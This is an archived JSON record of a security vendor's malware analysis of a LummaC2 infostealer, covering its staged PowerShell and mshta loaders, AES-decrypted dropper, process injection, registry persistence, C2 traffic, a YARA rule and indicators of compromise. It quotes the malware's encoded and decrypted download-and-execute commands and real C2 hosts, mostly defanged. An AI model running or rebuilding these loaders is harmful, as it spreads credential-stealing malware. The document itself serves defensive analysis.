{
	"id": "1a9859c5-1c28-422a-a0d1-7e38909f6bd1",
	"created_at": "2026-04-06T00:17:40.727521Z",
	"updated_at": "2026-04-10T13:11:35.648817Z",
	"deleted_at": null,
	"sha1_hash": "d8f442edafc32450f99af03b15430ce6906b935f",
	"title": "Obfuscated PowerShell leads to Lumma C2 Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1087575,
	"plain_text": "Obfuscated PowerShell leads to Lumma C2 Stealer\r\nArchived: 2026-04-05 13:28:09 UTC\r\nBlog\r\nPrefer audio? Listen to Rhys discuss this research on our Defend Your Time podcast episode.\r\nOverview\r\nIn recent months, we have observed an uptick in activities related to the LummaC2 infostealer. This report delves\r\ninto a new sample of LummaC2, which was initially discovered through a series of PowerShell commands that\r\nultimately downloaded and executed a payload on the targeted endpoint. Our analysis covers the different stages\r\nof the malware’s execution, from the initial PowerShell command to the subsequent payload decryption and\r\nexecution, providing insights into the tactics, techniques, and procedures (TTPs) used by the threat actor(s).\r\nWhat is Lumma Malware?\r\nLumma is an information-stealing malware written in C (programming language) that is designed to steal sensitive\r\ninformation. The malware has been observed being used as Malware-as-a-Service (MaaS), which was seen on\r\nRussian-speaking forums starting around 2022. Once the malware infects the target host, it attempts to steal\r\ninformation from the endpoint and then exfiltrate it to the command and control server. See more information\r\nhere: Lumma Malware family\r\nSample info\r\nSHA256: 2468e5bb596fa4543dba2adfe8fd795073486193b77108319e073b9924709a8a – First stage\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 1 of 12\n\nSHA256: 2caf283566656a13bf71f8ceac3c81f58a049c92a788368323b1ba25d872372e – Second stage\r\nBoth stages of the malware have been identified as LummaC2 Infostealer/Evader. We have also observed high\r\nentropy in some sections of the samples, which may indicate the presence of obfuscation. Neither file has a signed\r\nsignature, but they do contain file metadata that shows masquerading attempts. MITRE Technique ‘Masquerading’\r\nT1036.\r\nStatic Analysis\r\nFirst Stage:\r\nUpon initial discovery, we encountered this sample from a PowerShell encoded command that was attempting to\r\ncommunicate with a domain to download the LummaC2 malware sample.\r\n\"PowerShell.exe\" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAG0AYQB0AG8ALQBjAGEAbQBwAC0AdgA0AC4AYgAtAGMA\r\nWith this encoded command, we can use CyberChef to decode the string. The encoded command was identified as\r\nBase64. By running the following steps, we can decode it. Once decoded, we can see the next stage of the\r\nintrusion. With the information discovered, we observe ‘mshta’ followed by the domain, the path at the end and a\r\npotential file name. https://attack.mitre.org/techniques/T1059/001/\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 2 of 12\n\nMshta.exe is an executable file designed to execute Microsoft HTML files, known as ‘HTA’. As a legitimate\r\nMicrosoft Windows binary, it is considered a LOLbin (Living off the Land binary), which allows actors to use the\r\nprocess for malicious purposes. Technique: T1218.005\r\nmshta https[:]//mato-camp-v4[.]b-cdn[.]net/kesty\r\nOnce the ‘kesty’ file is executed, we observe a second PowerShell script being run. This script executes a HEX\r\nstring that is encrypted using AES. The key stored within the PowerShell command allows us to use some Python\r\ncode to decrypt the HEX string and observe the next stage of the intrusion. I have separated the HEX string from\r\nthe command to simplify the reading output.\r\n\"powershell[.]exe\" -w 1 -ep Unrestricted -nop function dhHMLxZL($zybwHU){return -split ($zybwHU -repl\r\nHex String\r\nB9EFAD8C773C4FE92E2E22914A07D7E3EFCBCCF45813B63684D5D0CE1F91BC8987190E70CCBAF581F2D0142BECBF89E5A6DCA\r\nfrom Crypto.Cipher import AES\r\nimport binascii\r\ndef dhHMLxZL(hex_string):\r\n return bytearray(binascii.unhexlify(hex_string))\r\n# Hexadecimal encoded string - payload\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 3 of 12\n\nhex_string = ('B9EFAD8C773C4FE92E2E22914A07D7E3EFCBCCF45813B63684D5D0CE1F91BC8987190E70CCBAF581F2D014\r\n# Decryption key\r\nkey_hex = '6D6B584A7142515A59457441736E454C'\r\nkey = dhHMLxZL(key_hex)\r\n# Initialization Vector\r\niv = bytearray(16)\r\n# Decrypt the data\r\ncipher = AES.new(key, AES.MODE_CBC, iv)\r\nencrypted_bytes = dhHMLxZL(hex_string)\r\ndecrypted_bytes = cipher.decrypt(encrypted_bytes)\r\ndecrypted_string = decrypted_bytes.decode('utf-8', errors='ignore')\r\nprint(decrypted_string)\r\nWithin the command, we observe ‘dhHMLxZL(‘6D6B584A7142515A59457441736E454C’)’, which we have\r\nidentified as the decryption key. By using a Python script, we can decode this.\r\nThe outcome is the following decrypted PowerShell script:\r\niexfunction qZw($lKt, $ySk){[IO.File]::WriteAllBytes($lKt, $ySk)};function xoj($lKt){$VDFW = $env:Tem\r\nFunctions Defined:\r\nqZw: Writes byte data to a file.\r\nxoj: Expands a zip archive to the temporary directory and executes the first file found in the archive.\r\nVIR: Downloads data from a given URL using TLS 1.2.\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 4 of 12\n\nAec: Decodes an array of integers by subtracting 3836 from each value and converting the result to a\r\ncharacter.\r\nmjq: Coordinates the downloading and execution of two zip files, U1.zip and U2.zip , from specific\r\nURLs. U2.zip contains “ashampoo.exe”.\r\nLooking at the functions defined, we have observed two potential zip files. From our observations, these files\r\ncontain additional encoding of URLs. Using this information, we were able to decode the URL arrays using the\r\n‘Aec’ function, and we obtained the following URLs:\r\nhttps[:]//campzips1[.]b-cdn[.]net/U1.zip\r\nhttps[:]//campzips1[.]b-cdn[.]net/U2.zip\r\ndef Aec(KUk):\r\n wqg = 3836\r\n LTu = ''.join([chr(ChY - wqg) for ChY in KUk])\r\n return LTu\r\n# Encoded URL arrays\r\nurl1_encoded = [3940, 3952, 3952, 3948, 3951, 3894, 3883, 3883, 3935, 3933, 3945, 3948, 3958, 3941, 3\r\nurl2_encoded = [3940, 3952, 3952, 3948, 3951, 3894, 3883, 3883, 3935, 3933, 3945, 3948, 3958, 3941, 3\r\n# Decoded URLs\r\nurl1 = Aec(url1_encoded)\r\nurl2 = Aec(url2_encoded)\r\nurl1, url2\r\nLooking at the URLs on VirusTotal, we have identified a PE file called BitlockerToGO Execution. We have also\r\ndiscovered that the process ‘ashampoo.exe’ was stored within ‘U2.zip,’ which we believe to be the secondary\r\nstage dropped malware known as Lumma.\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 5 of 12\n\nSecond Stage:\r\nLooking into the next stage of the malware, some of the domains have been taken down or the threat actor has\r\nceased activity. However, I was able to run the second stage sample ‘ashampoo.exe’ in a sandbox to perform some\r\ndynamic analysis, and this is the outcome\r\nThe first thing I wanted to examine was its execution to see what operations it performed and if there were any\r\nadditional child processes or other files being dropped.\r\nWe have discovered that ‘dllhost.exe’ was created as a child process. Malicious code is injected into\r\n‘Bitlockertogo.exe,’ which then creates two additional processes that finally create ‘dllhost.exe.’ Additionally, we\r\nobserved ‘dllhost.exe’ being used for command and control, with connections to the IP.\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 6 of 12\n\nFurthermore, we also observed an attempt at persistence. The process ‘mbssiy2zv5n8qjoazw144h95fvv3lwq.exe’\r\nwas observed being dropped from ‘ashampoo.exe’ \u003e ‘bitlockertogo.exe,’ which then creates the child process\r\n‘mbssiy2zv5n8qjoazw144h95fvv3lwq.exe.’ When we view process 7, we can observe a successful write to the\r\nregistry in ‘HKEY_USERS{USER Account HERE}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.’ This is\r\none of the most common spots for persistence, as it allows the actor to obtain access to the target endpoint.\r\nMITRE ATT\u0026CK T1547.001\r\nLooking further into the command and control of the malware, we can see from Figure 8 that ‘dllhost.exe’ is being\r\nused as the process for command and control. ‘Dllhost.exe’ is a known legitimate Microsoft Windows file,\r\nspecifically a COM surrogate process used by Windows to load COM objects.\r\nActors exploit this process maliciously by injecting code into it, instructing it to perform unauthorized actions.\r\nThis technique is commonly known as Process Injection. MITRE Technique T1055.\r\nHere, we have the PCAP of the malicious connection. From the dynamic analysis, we observed a connection to IP\r\n‘188.68.220[.]48.’ By setting this as the destination, we can see the communication between the source and\r\ndestination IP addresses. We observed multiple intervals of HTTP communication with the target C2 server.\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 7 of 12\n\nUpon further analysis of the PCAP file from the dynamic analysis, we observed a ‘POST’ request to\r\n‘vamplersam[.]info,’ where the request is sending data to the endpoint ‘/cfg.’ This could indicate a stream of data\r\nor commands being exchanged between the C2 server and the target endpoint. Although I am filtering the analysis\r\nto the target IP address, it’s clear that if a POST request is being made, commands are likely being sent to the\r\ntarget device from the C2 server in order to receive data.\r\nThe way this works is that the actor will send a command, such as ‘get file’ or ‘download file,’ allowing them to\r\ncollect data from the target device. This would then fall under the MITRE Technique ‘Collection’ and Exfiltration\r\nMITRE Technique Exfiltration. Another common aspect of Lumma is that it uses the User-Agent\r\n‘TeslaBrowser/5.5.’ However, in this sample, when examining the HTTP headers, we do not see this User-Agent.\r\nThis could be because the actor is using a custom client to send the requests, likely to avoid detection knowing\r\nthis User-Agent was used in prior samples.\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 8 of 12\n\nBehavioural Processes\r\nMITRE ATTACK Techniques\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 9 of 12\n\nYARA Rule\r\nrule LummaC2_Suspicious_Network_Activity {\r\n meta:\r\n author = \"Rhys Downing\"\r\n description = \"Detects suspicious repeated HTTP POST requests to C2 server from dllhost.exe\"\r\n reference = \"Lumma C2 Infostealer\"\r\n date = \"2024-08-11\"\r\n version = \"1.1\"\r\n tlp = \"WHITE\"\r\n strings:\r\n // Target the specific HTTP POST request to the /cfg endpoint\r\n $post_request_1 = \"POST /cfg HTTP/1.1\" ascii\r\n $post_request_2 = \"POST /cfg HTTP/1.1\" wide\r\n// Target the Host header indicating communication with the C2 server\r\n $host_header_1 = \"Host: vamplersam.info\" ascii\r\n $host_header_2 = \"Host: vamplersam.info\" wide\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 10 of 12\n\n// Target the IP address involved in the communication\r\n $ip_address = \"188.68.220.48\" ascii\r\n // Target the Content-Type for POST data\r\n $content_type_1 = \"Content-Type: application/x-www-form-urlencoded\" ascii\r\n $content_type_2 = \"Content-Type: application/x-www-form-urlencoded\" wide\r\n condition:\r\n // Match conditions for either ASCII or wide character encoding\r\n (all of ($post_request_1, $host_header_1, $content_type_1, $ip_address)) or\r\n (all of ($post_request_2, $host_header_2, $content_type_2, $ip_address))\r\n and\r\n // Ensure that the process is dllhost.exe\r\n pe.exports(\"dllhost.exe\")\r\n}\r\nMitigations\r\nEndpoint Protection and Monitoring\r\nEDR Solutions: Deploy and configure Endpoint Detection and Response (EDR) solutions to detect and\r\nrespond to suspicious behaviours, such as process injection, unusual process execution (e.g., dllhost.exe\r\nwith network activity), and file modifications.\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 11 of 12\n\nAttack Surface Reduction (ASR) Rules\r\nImplement ASR rules to block potentially malicious behavior. Key rules to consider include:\r\nBlock executable content from email and webmail clients.\r\nUse advanced protection against credential theft.\r\nBlock executable files from running unless they meet a prevalence, age, or trusted list criterion.\r\nIndicators of compromise\r\nURLs:\r\nhttps[:]//mato-camp-v4.b-cdn[.]net\r\nhttp[:]//campzips1.b-cdn[.]net/U1.zip\r\nhttps[:]//campzips1.b-cdn[.]net/U2.zip\r\nhttp[:]//sulphurhsum[.]shop\r\nhttp[:]//rainbowmynsjn[.]shop\r\nhttp[:]//assumedtribsosp[.]shop\r\nhttp[:]//chippyfroggsyhz[.]shop\r\nhttp[:]//ufort[.]info\r\nhttps[:]//bitbucket[.]org/dultevupse1/zeus/downloads/108GoDll.exe\r\nhttp[:]//creepydxzoxmj[.]shop\r\nhttp[:]//boattyownerwrv[.]shop\r\nhttp[:]//vamplersam[.]info/cfg\r\nhttps[:]//sulphurhsum[.]shop/api\r\nhttp[:]//budgetttysnzm[.]shop\r\nhttp[:]//definitonizmnx[.]shop\r\nhttp[:]//empiredzmwnx[.]shop\r\nIP Addresses:\r\n188.68.220[.]48 – Country: Russia\r\n185.166.143[.]48 – Country: Russia – Resolved Domain: bitbucket[.]org\r\nFile Names/Hashes:\r\nashampoo.exe – SHA256: 2caf283566656a13bf71f8ceac3c81f58a049c92a788368323b1ba25d872372e\r\nKesty[1] – SHA256: 2468e5bb596fa4543dba2adfe8fd795073486193b77108319e073b9924709a8a\r\n108GoDll.exe – SHA256: 32db2729ef61f2a19c4c3632f0de727476b7fce0d68b5dcec8d0246042a8e398\r\nmbssiy2zv5n8qjoazw144h95fvv3lwq.exe – SHA256:\r\n32db2729ef61f2a19c4c3632f0de727476b7fce0d68b5dcec8d0246042a8e398\r\nListen to Rhys discuss this research on our Defend Your Time podcast episode.\r\nSource: https://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nhttps://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.ontinue.com/resource/obfuscated-powershell-leads-to-lumma-c2-stealer/"
	],
	"report_names": [
		"obfuscated-powershell-leads-to-lumma-c2-stealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434660,
	"ts_updated_at": 1775826695,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d8f442edafc32450f99af03b15430ce6906b935f.pdf",
		"text": "https://archive.orkl.eu/d8f442edafc32450f99af03b15430ce6906b935f.txt",
		"img": "https://archive.orkl.eu/d8f442edafc32450f99af03b15430ce6906b935f.jpg"
	}
}